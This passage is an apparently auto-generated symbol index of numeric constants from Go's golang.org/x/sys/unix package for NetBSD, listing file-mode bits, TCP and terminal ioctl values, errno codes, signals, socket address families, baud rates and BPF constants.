constant S_IFDIR (line 1339) | S_IFDIR = 0x4000 constant S_IFIFO (line 1340) | S_IFIFO = 0x1000 constant S_IFLNK (line 1341) | S_IFLNK = 0xa000 constant S_IFMT (line 1342) | S_IFMT = 0xf000 constant S_IFREG (line 1343) | S_IFREG = 0x8000 constant S_IFSOCK (line 1344) | S_IFSOCK = 0xc000 constant S_IFWHT (line 1345) | S_IFWHT = 0xe000 constant S_IREAD (line 1346) | S_IREAD = 0x100 constant S_IRGRP (line 1347) | S_IRGRP = 0x20 constant S_IROTH (line 1348) | S_IROTH = 0x4 constant S_IRUSR (line 1349) | S_IRUSR = 0x100 constant S_IRWXG (line 1350) | S_IRWXG = 0x38 constant S_IRWXO (line 1351) | S_IRWXO = 0x7 constant S_IRWXU (line 1352) | S_IRWXU = 0x1c0 constant S_ISGID (line 1353) | S_ISGID = 0x400 constant S_ISTXT (line 1354) | S_ISTXT = 0x200 constant S_ISUID (line 1355) | S_ISUID = 0x800 constant S_ISVTX (line 1356) | S_ISVTX = 0x200 constant S_IWGRP (line 1357) | S_IWGRP = 0x10 constant S_IWOTH (line 1358) | S_IWOTH = 0x2 constant S_IWRITE (line 1359) | S_IWRITE = 0x80 constant S_IWUSR (line 1360) | S_IWUSR = 0x80 constant S_IXGRP (line 1361) | S_IXGRP = 0x8 constant S_IXOTH (line 1362) | S_IXOTH = 0x1 constant S_IXUSR (line 1363) | S_IXUSR = 0x40 constant S_LOGIN_SET (line 1364) | S_LOGIN_SET = 0x1 constant TCIFLUSH (line 1365) | TCIFLUSH = 0x1 constant TCIOFLUSH (line 1366) | TCIOFLUSH = 0x3 constant TCOFLUSH (line 1367) | TCOFLUSH = 0x2 constant TCP_CONGCTL (line 1368) | TCP_CONGCTL = 0x20 constant TCP_KEEPCNT (line 1369) | TCP_KEEPCNT = 0x6 constant TCP_KEEPIDLE (line 1370) | TCP_KEEPIDLE = 0x3 constant TCP_KEEPINIT (line 1371) | TCP_KEEPINIT = 0x7 constant TCP_KEEPINTVL (line 1372) | TCP_KEEPINTVL = 0x5 constant TCP_MAXBURST (line 1373) | TCP_MAXBURST = 0x4 constant TCP_MAXSEG (line 1374) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1375) | TCP_MAXWIN = 0xffff constant TCP_MAX_WINSHIFT (line 1376) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1377) | TCP_MD5SIG = 0x10 constant TCP_MINMSS (line 1378) | TCP_MINMSS = 0xd8 constant TCP_MSS (line 1379) | TCP_MSS = 0x218 constant TCP_NODELAY (line 1380) | TCP_NODELAY = 0x1 constant TCSAFLUSH (line 1381) | TCSAFLUSH = 0x2 constant TIOCCBRK (line 1382) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1383) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 1384) | TIOCCONS = 0x80047462 constant TIOCDCDTIMESTAMP (line 1385) | TIOCDCDTIMESTAMP = 0x40107458 constant TIOCDRAIN (line 1386) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1387) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1388) | TIOCEXT = 0x80047460 constant TIOCFLAG_CDTRCTS (line 1389) | TIOCFLAG_CDTRCTS = 0x10 constant TIOCFLAG_CLOCAL (line 1390) | TIOCFLAG_CLOCAL = 0x2 constant TIOCFLAG_CRTSCTS (line 1391) | TIOCFLAG_CRTSCTS = 0x4 constant TIOCFLAG_MDMBUF (line 1392) | TIOCFLAG_MDMBUF = 0x8 constant TIOCFLAG_SOFTCAR (line 1393) | TIOCFLAG_SOFTCAR = 0x1 constant TIOCFLUSH (line 1394) | TIOCFLUSH = 0x80047410 constant TIOCGETA (line 1395) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1396) | TIOCGETD = 0x4004741a constant TIOCGFLAGS (line 1397) | TIOCGFLAGS = 0x4004745d constant TIOCGLINED (line 1398) | TIOCGLINED = 0x40207442 constant TIOCGPGRP (line 1399) | TIOCGPGRP = 0x40047477 constant TIOCGQSIZE (line 1400) | TIOCGQSIZE = 0x40047481 constant TIOCGRANTPT (line 1401) | TIOCGRANTPT = 0x20007447 constant TIOCGSID (line 1402) | TIOCGSID = 0x40047463 constant TIOCGSIZE (line 1403) | TIOCGSIZE = 0x40087468 constant TIOCGWINSZ (line 1404) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1405) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1406) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 1407) | TIOCMGET = 0x4004746a constant TIOCMSET (line 1408) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1409) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1410) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1411) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1412) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1413) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1414) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1415) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1416) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1417) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1418) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1419) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1420) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1421) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1422) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1423) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1424) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1425) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1426) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1427) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1428) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1429) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1430) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1431) | TIOCPKT_STOP = 0x4 constant TIOCPTMGET (line 1432) | TIOCPTMGET = 0x40287446 constant TIOCPTSNAME (line 1433) | TIOCPTSNAME = 0x40287448 constant TIOCRCVFRAME (line 1434) | TIOCRCVFRAME = 0x80087445 constant TIOCREMOTE (line 1435) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1436) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1437) | TIOCSCTTY = 0x20007461 constant TIOCSDTR (line 1438) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1439) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1440) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1441) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1442) | TIOCSETD = 0x8004741b constant TIOCSFLAGS (line 1443) | TIOCSFLAGS = 0x8004745c constant TIOCSIG (line 1444) | TIOCSIG = 0x2000745f constant TIOCSLINED (line 1445) | TIOCSLINED = 0x80207443 constant TIOCSPGRP (line 1446) | TIOCSPGRP = 0x80047476 constant TIOCSQSIZE (line 1447) | TIOCSQSIZE = 0x80047480 constant TIOCSSIZE (line 1448) | TIOCSSIZE = 0x80087467 constant TIOCSTART (line 1449) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1450) | TIOCSTAT = 0x80047465 constant TIOCSTI (line 1451) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1452) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1453) | TIOCSWINSZ = 0x80087467 constant TIOCUCNTL (line 1454) | TIOCUCNTL = 0x80047466 constant TIOCXMTFRAME (line 1455) | TIOCXMTFRAME = 0x80087444 constant TOSTOP (line 1456) | TOSTOP = 0x400000 constant VDISCARD (line 1457) | VDISCARD = 0xf constant VDSUSP (line 1458) | VDSUSP = 0xb constant VEOF (line 1459) | VEOF = 0x0 constant VEOL (line 1460) | VEOL = 0x1 constant VEOL2 (line 1461) | VEOL2 = 0x2 constant VERASE (line 1462) | VERASE = 0x3 constant VINTR (line 1463) | VINTR = 0x8 constant VKILL (line 1464) | VKILL = 0x5 constant VLNEXT (line 1465) | VLNEXT = 0xe constant VMIN (line 1466) | VMIN = 0x10 constant VQUIT (line 1467) | VQUIT = 0x9 constant VREPRINT (line 1468) | VREPRINT = 0x6 constant VSTART (line 1469) | VSTART = 0xc constant VSTATUS (line 1470) | VSTATUS = 0x12 constant VSTOP (line 1471) | VSTOP = 0xd constant VSUSP (line 1472) | VSUSP = 0xa constant VTIME (line 1473) | VTIME = 0x11 constant VWERASE (line 1474) | VWERASE = 0x4 constant WALL (line 1475) | WALL = 0x8 constant WALLSIG (line 1476) | WALLSIG = 0x8 constant WALTSIG (line 1477) | WALTSIG = 0x4 constant WCLONE (line 1478) | WCLONE = 0x4 constant WCOREFLAG (line 1479) | WCOREFLAG = 0x80 constant WNOHANG (line 1480) | WNOHANG = 0x1 constant WNOWAIT (line 1481) | WNOWAIT = 0x10000 constant WNOZOMBIE (line 1482) | WNOZOMBIE = 0x20000 constant WOPTSCHECKED (line 1483) | WOPTSCHECKED = 0x40000 constant WSTOPPED (line 1484) | WSTOPPED = 0x7f constant WUNTRACED (line 1485) | WUNTRACED = 0x2 constant E2BIG (line 1490) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1491) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1492) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1493) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1494) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1495) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1496) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1497) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1498) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1499) | EBADMSG = syscall.Errno(0x58) constant EBADRPC (line 1500) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1501) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1502) | ECANCELED = syscall.Errno(0x57) constant ECHILD (line 1503) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1504) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1505) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1506) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1507) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1508) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1509) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1510) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1511) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1512) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1513) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1514) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1515) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1516) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1517) | EIDRM = syscall.Errno(0x52) constant EILSEQ (line 1518) | EILSEQ = syscall.Errno(0x55) constant EINPROGRESS (line 1519) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1520) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1521) | EINVAL = syscall.Errno(0x16) constant EIO (line 1522) | EIO = syscall.Errno(0x5) constant EISCONN (line 1523) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1524) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1525) | ELAST = syscall.Errno(0x60) constant ELOOP (line 1526) | ELOOP = syscall.Errno(0x3e) constant EMFILE (line 1527) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1528) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1529) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 1530) | EMULTIHOP = syscall.Errno(0x5e) constant ENAMETOOLONG (line 1531) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1532) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1533) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1534) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1535) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1536) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1537) | ENOATTR = syscall.Errno(0x5d) constant ENOBUFS (line 1538) | ENOBUFS = syscall.Errno(0x37) constant ENODATA (line 1539) | ENODATA = syscall.Errno(0x59) constant ENODEV (line 1540) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1541) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1542) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1543) | ENOLCK = syscall.Errno(0x4d) constant ENOLINK (line 1544) | ENOLINK = syscall.Errno(0x5f) constant ENOMEM (line 1545) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1546) | ENOMSG = syscall.Errno(0x53) constant ENOPROTOOPT (line 1547) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1548) | ENOSPC = syscall.Errno(0x1c) constant ENOSR (line 1549) | ENOSR = syscall.Errno(0x5a) constant ENOSTR (line 1550) | ENOSTR = syscall.Errno(0x5b) constant ENOSYS (line 1551) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1552) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1553) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1554) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1555) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTSOCK (line 1556) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1557) | ENOTSUP = syscall.Errno(0x56) constant ENOTTY (line 1558) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1559) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1560) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1561) | EOVERFLOW = syscall.Errno(0x54) constant EPERM (line 1562) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1563) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1564) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1565) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1566) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1567) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1568) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1569) | EPROTO = syscall.Errno(0x60) constant EPROTONOSUPPORT (line 1570) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1571) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1572) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1573) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1574) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1575) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1576) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1577) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1578) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1579) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1580) | ESTALE = syscall.Errno(0x46) constant ETIME (line 1581) | ETIME = syscall.Errno(0x5c) constant ETIMEDOUT (line 1582) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1583) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1584) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1585) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1586) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1587) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1592) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1593) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1594) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1595) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1596) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1597) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1598) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1599) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1600) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1601) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1602) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1603) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1604) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1605) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1606) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1607) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 1608) | SIGPWR = syscall.Signal(0x20) constant SIGQUIT (line 1609) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1610) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1611) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1612) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1613) | SIGTERM = syscall.Signal(0xf) constant SIGTRAP (line 1614) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1615) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1616) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1617) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1618) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1619) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1620) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1621) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1622) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1623) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1624) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_netbsd_arm.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_ARP (line 15) | AF_ARP = 0x1c constant AF_BLUETOOTH (line 16) | AF_BLUETOOTH = 0x1f constant AF_CCITT (line 17) | AF_CCITT = 0xa constant AF_CHAOS (line 18) | AF_CHAOS = 0x5 constant AF_CNT (line 19) | AF_CNT = 0x15 constant AF_COIP (line 20) | AF_COIP = 0x14 constant AF_DATAKIT (line 21) | AF_DATAKIT = 0x9 constant AF_DECnet (line 22) | AF_DECnet = 0xc constant AF_DLI (line 23) | AF_DLI = 0xd constant AF_E164 (line 24) | AF_E164 = 0x1a constant AF_ECMA (line 25) | AF_ECMA = 0x8 constant AF_HYLINK (line 26) | AF_HYLINK = 0xf constant AF_IEEE80211 (line 27) | AF_IEEE80211 = 0x20 constant AF_IMPLINK (line 28) | AF_IMPLINK = 0x3 constant AF_INET (line 29) | AF_INET = 0x2 constant AF_INET6 (line 30) | AF_INET6 = 0x18 constant AF_IPX (line 31) | AF_IPX = 0x17 constant AF_ISDN (line 32) | AF_ISDN = 0x1a constant AF_ISO (line 33) | AF_ISO = 0x7 constant AF_LAT (line 34) | AF_LAT = 0xe constant AF_LINK (line 35) | AF_LINK = 0x12 constant AF_LOCAL (line 36) | AF_LOCAL = 0x1 constant AF_MAX (line 37) | AF_MAX = 0x23 constant AF_MPLS (line 38) | AF_MPLS = 0x21 constant AF_NATM (line 39) | AF_NATM = 0x1b constant AF_NS (line 40) | AF_NS = 0x6 constant AF_OROUTE (line 41) | AF_OROUTE = 0x11 constant AF_OSI (line 42) | AF_OSI = 0x7 constant AF_PUP (line 43) | AF_PUP = 0x4 constant AF_ROUTE (line 44) | AF_ROUTE = 0x22 constant AF_SNA (line 45) | AF_SNA = 0xb constant AF_UNIX (line 46) | AF_UNIX = 0x1 constant AF_UNSPEC (line 47) | AF_UNSPEC = 0x0 constant ARPHRD_ARCNET (line 48) | ARPHRD_ARCNET = 0x7 constant ARPHRD_ETHER (line 49) | ARPHRD_ETHER = 0x1 constant ARPHRD_FRELAY (line 50) | ARPHRD_FRELAY = 0xf constant ARPHRD_IEEE1394 (line 51) | ARPHRD_IEEE1394 = 0x18 constant ARPHRD_IEEE802 (line 52) | ARPHRD_IEEE802 = 0x6 constant ARPHRD_STRIP (line 53) | ARPHRD_STRIP = 0x17 constant B0 (line 54) | B0 = 0x0 constant B110 (line 55) | B110 = 0x6e constant B115200 (line 56) | B115200 = 0x1c200 constant B1200 (line 57) | B1200 = 0x4b0 constant B134 (line 58) | B134 = 0x86 constant B14400 (line 59) | B14400 = 0x3840 constant B150 (line 60) | B150 = 0x96 constant B1800 (line 61) | B1800 = 0x708 constant B19200 (line 62) | B19200 = 0x4b00 constant B200 (line 63) | B200 = 0xc8 constant B230400 (line 64) | B230400 = 0x38400 constant B2400 (line 65) | B2400 = 0x960 constant B28800 (line 66) | B28800 = 0x7080 constant B300 (line 67) | B300 = 0x12c constant B38400 (line 68) | B38400 = 0x9600 constant B460800 (line 69) | B460800 = 0x70800 constant B4800 (line 70) | B4800 = 0x12c0 constant B50 (line 71) | B50 = 0x32 constant B57600 (line 72) | B57600 = 0xe100 constant B600 (line 73) | B600 = 0x258 constant B7200 (line 74) | B7200 = 0x1c20 constant B75 (line 75) | B75 = 0x4b constant B76800 (line 76) | B76800 = 0x12c00 constant B921600 (line 77) | B921600 = 0xe1000 constant B9600 (line 78) | B9600 = 0x2580 constant BIOCFEEDBACK (line 79) | BIOCFEEDBACK = 0x8004427d constant BIOCFLUSH (line 80) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 81) | BIOCGBLEN = 0x40044266 constant BIOCGDLT (line 82) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 83) | BIOCGDLTLIST = 0xc0084277 constant BIOCGETIF (line 84) | BIOCGETIF = 0x4090426b constant BIOCGFEEDBACK (line 85) | BIOCGFEEDBACK = 0x4004427c constant BIOCGHDRCMPLT (line 86) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRTIMEOUT (line 87) | BIOCGRTIMEOUT = 0x400c427b constant BIOCGSEESENT (line 88) | BIOCGSEESENT = 0x40044278 constant BIOCGSTATS (line 89) | BIOCGSTATS = 0x4080426f constant BIOCGSTATSOLD (line 90) | BIOCGSTATSOLD = 0x4008426f constant BIOCIMMEDIATE (line 91) | BIOCIMMEDIATE = 0x80044270 constant BIOCPROMISC (line 92) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 93) | BIOCSBLEN = 0xc0044266 constant BIOCSDLT (line 94) | BIOCSDLT = 0x80044276 constant BIOCSETF (line 95) | BIOCSETF = 0x80084267 constant BIOCSETIF (line 96) | BIOCSETIF = 0x8090426c constant BIOCSFEEDBACK (line 97) | BIOCSFEEDBACK = 0x8004427d constant BIOCSHDRCMPLT (line 98) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRTIMEOUT (line 99) | BIOCSRTIMEOUT = 0x800c427a constant BIOCSSEESENT (line 100) | BIOCSSEESENT = 0x80044279 constant BIOCSTCPF (line 101) | BIOCSTCPF = 0x80084272 constant BIOCSUDPF (line 102) | BIOCSUDPF = 0x80084273 constant BIOCVERSION (line 103) | BIOCVERSION = 0x40044271 constant BPF_A (line 104) | BPF_A = 0x10 constant BPF_ABS (line 105) | BPF_ABS = 0x20 constant BPF_ADD (line 106) | BPF_ADD = 0x0 constant BPF_ALIGNMENT (line 107) | BPF_ALIGNMENT = 0x4 constant BPF_ALIGNMENT32 (line 108) | BPF_ALIGNMENT32 = 0x4 constant BPF_ALU (line 109) | BPF_ALU = 0x4 constant BPF_AND (line 110) | BPF_AND = 0x50 constant BPF_B (line 111) | BPF_B = 0x10 constant BPF_DFLTBUFSIZE (line 112) | BPF_DFLTBUFSIZE = 0x100000 constant BPF_DIV (line 113) | BPF_DIV = 0x30 constant BPF_H (line 114) | BPF_H = 0x8 constant BPF_IMM (line 115) | BPF_IMM = 0x0 constant BPF_IND (line 116) | BPF_IND = 0x40 constant BPF_JA (line 117) | BPF_JA = 0x0 constant BPF_JEQ (line 118) | BPF_JEQ = 0x10 constant BPF_JGE (line 119) | BPF_JGE = 0x30 constant BPF_JGT (line 120) | BPF_JGT = 0x20 constant BPF_JMP (line 121) | BPF_JMP = 0x5 constant BPF_JSET (line 122) | BPF_JSET = 0x40 constant BPF_K (line 123) | BPF_K = 0x0 constant BPF_LD (line 124) | BPF_LD = 0x0 constant BPF_LDX (line 125) | BPF_LDX = 0x1 constant BPF_LEN (line 126) | BPF_LEN = 0x80 constant BPF_LSH (line 127) | BPF_LSH = 0x60 constant BPF_MAJOR_VERSION (line 128) | BPF_MAJOR_VERSION = 0x1 constant BPF_MAXBUFSIZE (line 129) | BPF_MAXBUFSIZE = 0x1000000 constant BPF_MAXINSNS (line 130) | BPF_MAXINSNS = 0x200 constant BPF_MEM (line 131) | BPF_MEM = 0x60 constant BPF_MEMWORDS (line 132) | BPF_MEMWORDS = 0x10 constant BPF_MINBUFSIZE (line 133) | BPF_MINBUFSIZE = 0x20 constant BPF_MINOR_VERSION (line 134) | BPF_MINOR_VERSION = 0x1 constant BPF_MISC (line 135) | BPF_MISC = 0x7 constant BPF_MSH (line 136) | BPF_MSH = 0xa0 constant BPF_MUL (line 137) | BPF_MUL = 0x20 constant BPF_NEG (line 138) | BPF_NEG = 0x80 constant BPF_OR (line 139) | BPF_OR = 0x40 constant BPF_RELEASE (line 140) | BPF_RELEASE = 0x30bb6 constant BPF_RET (line 141) | BPF_RET = 0x6 constant BPF_RSH (line 142) | BPF_RSH = 0x70 constant BPF_ST (line 143) | BPF_ST = 0x2 constant BPF_STX (line 144) | BPF_STX = 0x3 constant BPF_SUB (line 145) | BPF_SUB = 0x10 constant BPF_TAX (line 146) | BPF_TAX = 0x0 constant BPF_TXA (line 147) | BPF_TXA = 0x80 constant BPF_W (line 148) | BPF_W = 0x0 constant BPF_X (line 149) | BPF_X = 0x8 constant BRKINT (line 150) | BRKINT = 0x2 constant CFLUSH (line 151) | CFLUSH = 0xf constant CLOCAL (line 152) | CLOCAL = 0x8000 constant CPUSTATES (line 153) | CPUSTATES = 0x5 constant CP_IDLE (line 154) | CP_IDLE = 0x4 constant CP_INTR (line 155) | CP_INTR = 0x3 constant CP_NICE (line 156) | CP_NICE = 0x1 constant CP_SYS (line 157) | CP_SYS = 0x2 constant CP_USER (line 158) | CP_USER = 0x0 constant CREAD (line 159) | CREAD = 0x800 constant CRTSCTS (line 160) | CRTSCTS = 0x10000 constant CS5 (line 161) | CS5 = 0x0 constant CS6 (line 162) | CS6 = 0x100 constant CS7 (line 163) | CS7 = 0x200 constant CS8 (line 164) | CS8 = 0x300 constant CSIZE (line 165) | CSIZE = 0x300 constant CSTART (line 166) | CSTART = 0x11 constant CSTATUS (line 167) | CSTATUS = 0x14 constant CSTOP (line 168) | CSTOP = 0x13 constant CSTOPB (line 169) | CSTOPB = 0x400 constant CSUSP (line 170) | CSUSP = 0x1a constant CTL_HW (line 171) | CTL_HW = 0x6 constant CTL_KERN (line 172) | CTL_KERN = 0x1 constant CTL_MAXNAME (line 173) | CTL_MAXNAME = 0xc constant CTL_NET (line 174) | CTL_NET = 0x4 constant CTL_QUERY (line 175) | CTL_QUERY = -0x2 constant DIOCBSFLUSH (line 176) | DIOCBSFLUSH = 0x20006478 constant DLT_A429 (line 177) | DLT_A429 = 0xb8 constant DLT_A653_ICM (line 178) | DLT_A653_ICM = 0xb9 constant DLT_AIRONET_HEADER (line 179) | DLT_AIRONET_HEADER = 0x78 constant DLT_AOS (line 180) | DLT_AOS = 0xde constant DLT_APPLE_IP_OVER_IEEE1394 (line 181) | DLT_APPLE_IP_OVER_IEEE1394 = 0x8a constant DLT_ARCNET (line 182) | DLT_ARCNET = 0x7 constant DLT_ARCNET_LINUX (line 183) | DLT_ARCNET_LINUX = 0x81 constant DLT_ATM_CLIP (line 184) | DLT_ATM_CLIP = 0x13 constant DLT_ATM_RFC1483 (line 185) | DLT_ATM_RFC1483 = 0xb constant DLT_AURORA (line 186) | DLT_AURORA = 0x7e constant DLT_AX25 (line 187) | DLT_AX25 = 0x3 constant DLT_AX25_KISS (line 188) | DLT_AX25_KISS = 0xca constant DLT_BACNET_MS_TP (line 189) | DLT_BACNET_MS_TP = 0xa5 constant DLT_BLUETOOTH_HCI_H4 (line 190) | DLT_BLUETOOTH_HCI_H4 = 0xbb constant DLT_BLUETOOTH_HCI_H4_WITH_PHDR (line 191) | DLT_BLUETOOTH_HCI_H4_WITH_PHDR = 0xc9 constant DLT_CAN20B (line 192) | DLT_CAN20B = 0xbe constant DLT_CAN_SOCKETCAN (line 193) | DLT_CAN_SOCKETCAN = 0xe3 constant DLT_CHAOS (line 194) | DLT_CHAOS = 0x5 constant DLT_CISCO_IOS (line 195) | DLT_CISCO_IOS = 0x76 constant DLT_C_HDLC (line 196) | DLT_C_HDLC = 0x68 constant DLT_C_HDLC_WITH_DIR (line 197) | 